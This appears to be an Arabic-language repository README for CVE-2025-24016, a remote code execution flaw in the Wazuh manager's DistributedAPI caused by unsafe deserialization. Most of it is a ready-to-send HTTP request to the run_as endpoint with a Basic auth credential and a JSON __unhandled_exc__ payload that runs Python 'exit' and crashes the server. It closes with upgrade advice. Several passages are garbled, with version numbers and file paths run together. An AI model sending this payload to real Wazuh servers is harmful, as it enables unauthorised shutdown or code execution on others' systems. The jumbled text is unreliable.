
CVE-2025-24016: ثغرة RCE في خادم Wazuh! تنفيذ تعليمات برمجية عن بُعد
يوضح هذا المستودع ثغرة تنفيذ الأوامر عن بُعد (RCE) في خادم Wazuh، والتي نجمت عن إلغاء تسلسل غير آمن في حزمة wazuh-manager. تتيح الثغرة للمهاجمين عن بُعد ممن لديهم إمكانية الوصول إلى واجهة برمجة التطبيقات (لوحة التحكم المخترقة، خوادم Wazuh في الكتلة، أو تكوينات معينة تحتوي على عوامل مخترقة) تنفيذ تعليمات برمجية عشوائية على الخادم.
wazuh-manager الإصدار >= 4.4.0>= 4.9.1تحدث الثغرة في واجهة برمجة تطبيقات Wazuh، حيث يتم تسلسل المعاملات في DistributedAPI بتنسيق JSON وإلغاء تسلسلها باستخدام في ملف . يمكن للمهاجم استغلال هذه الثغرة عن طريق حقن قاموس غير منقح في طلبات DAPI، مما قد يؤدي إلى تقييم تعليمات برمجية عشوائية بلغة Python.
as_wazuh_objectframework/wazuh/core/cluster/common.pyيمكن تشغيل الثغرة باستخدام نقطة النهاية run_as، التي تتيح للمهاجم التحكم في وسيطة auth_context. من خلال صياغة طلب ضار، يمكن تنفيذ تعليمات برمجية عشوائية على الخادم الرئيسي.
لتشغيل هذه الثغرة باستخدام واجهة برمجة تطبيقات الخادم، اتبع الخطوات التالية.
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}

wazuh-wui:MyS3cr37P450r.*-).__unhandled_exc__ الذي يشغل تنفيذ تعليمات برمجية عشوائية بلغة Python (في هذه الحالة exit).>= 4.4.0 حتى 4.9.0 (غير مصححة بعد).exit مما يتسبب في إيقاف تشغيل خادم Wazuh.لحماية أنظمتك، قم بالترقية إلى إصدار Wazuh >= 4.9.1 حيث تم تصحيح هذه المشكلة.